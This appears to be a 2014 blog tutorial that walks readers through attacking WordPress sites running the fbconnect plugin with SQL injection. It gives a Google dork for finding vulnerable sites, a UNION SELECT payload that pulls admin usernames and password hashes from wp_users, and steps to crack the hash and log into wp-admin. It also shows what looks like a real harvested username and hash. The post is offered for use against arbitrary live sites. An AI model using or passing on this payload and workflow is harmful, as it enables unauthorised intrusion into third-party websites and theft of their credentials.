Monday, 10 March 2014

Exploit Wordpress : fbconnect SQL Injection Vulnerability







Hey guys, today i'm going to share with you about an exploit in Wordpress that enable you to get the admin's Username and Password(encrypted)

Finding Vulnerable Target

Dork: inurl:"fbconnect_action=myhome" 

Exploit: 

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,
7,8,9,10,11,12+from+wp_users--

1- Copy the dork and paste it on Google

2- Choose any site and you will see something like this or similar,





Exploiting Target

1- Let say your target URL is like this,

http://www/site.com/?fbconnect_action=myhome&userid=3

Paste the exploit behind the URL, so it will be like this

http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--

2- So there you go, you have the Username and the Password. But, don't forget to decrypt it first ;)




user:password

So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.

3- After you have successfully decrypt the password, you can login into the website at

www.site.com/wp-login.php

or

www.site.com/wp-admin